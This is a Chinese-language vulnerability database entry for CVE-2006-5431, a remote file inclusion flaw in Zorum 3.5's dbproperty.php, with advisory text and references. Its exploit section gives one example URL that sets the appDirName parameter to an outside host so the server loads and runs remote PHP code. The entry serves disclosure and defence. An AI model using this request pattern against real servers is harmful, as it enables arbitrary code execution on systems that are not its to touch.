PHPOutsourcing Zorum 'DBProperty.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111329 漏洞类型 输入验证
发布时间 2006-10-19 更新时间 2006-10-23
CVE编号 CVE-2006-5431 CNNVD-ID CNNVD-200610-363
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28828
https://cxsecurity.com/issue/WLB-2006100112
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-363
|漏洞详情
PHPOutsourcingZorum3.5及更早版本的gorum/dbproperty.php中的PHP远程文件包含漏洞,远程攻击者可以通过appDirName参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/20606/info

Zorum is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

A successful exploit of this issue allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

Version 3.5 is vulnerable to this issue; other versions may also be affected.

http://www.example.com/[scerpitPath]/gorum/dbproperty.php?appDirName=http://www.example2.com
|参考资料

来源:XF
名称:zorum-dbproperty-file-include(29648)
链接:http://xforce.iss.net/xforce/xfdb/29648
来源:BID
名称:20606
链接:http://www.securityfocus.com/bid/20606
来源:BUGTRAQ
名称:20061018zorum_3_5<=(dbproperty.php)RemoteFileInclusionExploit
链接:http://www.securityfocus.com/archive/1/archive/1/449105/100/0/threaded
来源:SREASON
名称:1748
链接:http://securityreason.com/securityalert/1748